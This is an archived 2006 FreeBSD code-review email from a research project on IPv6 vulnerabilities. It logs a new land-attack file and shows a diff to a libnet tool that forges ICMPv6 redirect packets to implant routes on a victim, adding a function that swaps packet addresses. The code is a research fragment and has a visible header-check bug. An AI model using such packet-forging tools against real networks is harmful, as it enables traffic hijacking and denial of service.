PERFORCE change 100396 for review
Clément Lecigne
clem1 at FreeBSD.org
Sat Jul 1 14:21:13 UTC 2006
http://perforce.freebsd.org/chv.cgi?CH=100396
Change 100396 by clem1 at clem1_ipv6vulns on 2006/07/01 14:20:17
land6.c - implementation of the IPv4 land attack. KAME is not vulnerable.
Some improvements around redir6.c.
Affected files ...
.. //depot/projects/soc2006/clem1_ipv6vulns/libnet/sample/land6.c#1 add
.. //depot/projects/soc2006/clem1_ipv6vulns/libnet/sample/redir6.c#2 edit
Differences ...
==== //depot/projects/soc2006/clem1_ipv6vulns/libnet/sample/redir6.c#2 (text+ko) ====
@@ -3,6 +3,7 @@
* Implementation of the route implanting attack by Vanhauser
* using icmp6 echo request and redirect message.
*
+ * Copyright (c) 2006 Clément Lecigne <clem1 at FreeBSD.org>
* Copyright (c) 1998 - 2001 Mike D. Schiffman <mike at infonexus.com>
* All rights reserved.
*
@@ -38,6 +39,7 @@
void redir6(char *, int , struct libnet_in6_addr, struct libnet_in6_addr, struct libnet_in6_addr, struct libnet_in6_addr, char *, char *);
void usage(char *);
+void inverse(char *);
int
main(int ac, char **av)
@@ -160,7 +162,8 @@
}
pkt = libnet_dump_packet(l);
-
+ inverse(pkt + LIBNET_ETH_H);
+
libnet_destroy(l);
usleep(TIMEWAIT);
@@ -236,7 +239,40 @@
libnet_destroy(l);
}
-
+
+/*
+ * inverse src and dsp ip in ipv6 header.
+ * replace echo request type by echo reply type.
+ * renew the hop limit.
+ */
+void inverse(char *pkt){
+ char tmp[16];
+
+ /*
+ * make sure that pkt starts with an ipv6 header.
+ */
+ if (pkt[0] & 0xf != 6)
+ {
+ fprintf(stdout, "%s(): packet does not start with an ipv6 header\n", __func__);
+ exit(EXIT_FAILURE);
+ }
+
+ /* restore source */
+ memcpy(tmp, pkt + 8, 16);
+ /* erase ip6 source with ip6 dest */
+ memcpy(pkt + 8, pkt + 24, 16);
+ /* erase ip6 dst with saved ip6 source */
+ memcpy(pkt + 24, tmp, 16);
+ /* renew hl */
+ pkt[7] = 255;
+ /* icmp type */
+ pkt[40] = ICMP6_ECHOREPLY;
+
+ /*
+ * XXX: checksum recalculation.
+ */
+ return;
+}
void usage(char *prog){
fprintf(stdout, "usage: %s -a attack-ip -v victim-ip -r router-ip -d dest-ip"
More information about the p4-projects
mailing list